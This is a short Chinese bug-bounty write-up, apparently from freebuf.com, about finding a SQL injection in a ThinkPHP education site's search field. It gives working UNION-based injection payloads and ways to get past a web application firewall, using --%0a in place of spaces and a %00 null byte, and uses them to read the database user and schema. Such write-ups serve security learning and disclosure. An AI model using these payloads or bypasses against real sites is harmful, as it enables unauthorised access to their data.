记一次挖掘某SRC漏洞的思路 – 作者:a1412666499

漏洞已修复 只是分享一下自己挖掘过程的思路来提供大家学习

打开网站，www.xxedu.cn 发现最上面有个输入框

判断注入

输入一个单元号

页面报错

两个则正常

判断列数

首先闭合,这里程序使用的是thinkphp,查询时候会用小括号包裹,所以首先用’)闭合

1 keywords=1′) %23

order by x被拦截,用–%0a代替空格即可

27报错代表只有26行

联合注入

直接上union select会一直卡着没有任何返回

把空格都改为–%0a，成功响应

在select跟1,2,3…之间用两个–%0a负责会无响应

1 =1′)‐‐%0aunion‐‐%0aselect‐‐%0a‐‐%0a1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1

6,17,18,19,20,21,22,23,24,25,26

但是发现还是响应错误，这里就猜测是错误跟拦截响应都相同

联合注入Bypass

在1后面加上%00并url编码,原理是waf把空字节认为是结束导致了后面的语句可以绕过

1 1%00′)‐‐%0aunion‐‐%0aselect‐‐%0a‐‐%0a1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,

16,17,18,19,20,21,22,23,24,25,26

2 %23

得到回显点为4

使用user–%0a()得到用户cse

SCHEMA–%0a()得到数据库cse

来源：freebuf.com 2020-09-23 11:22:29 by: a1412666499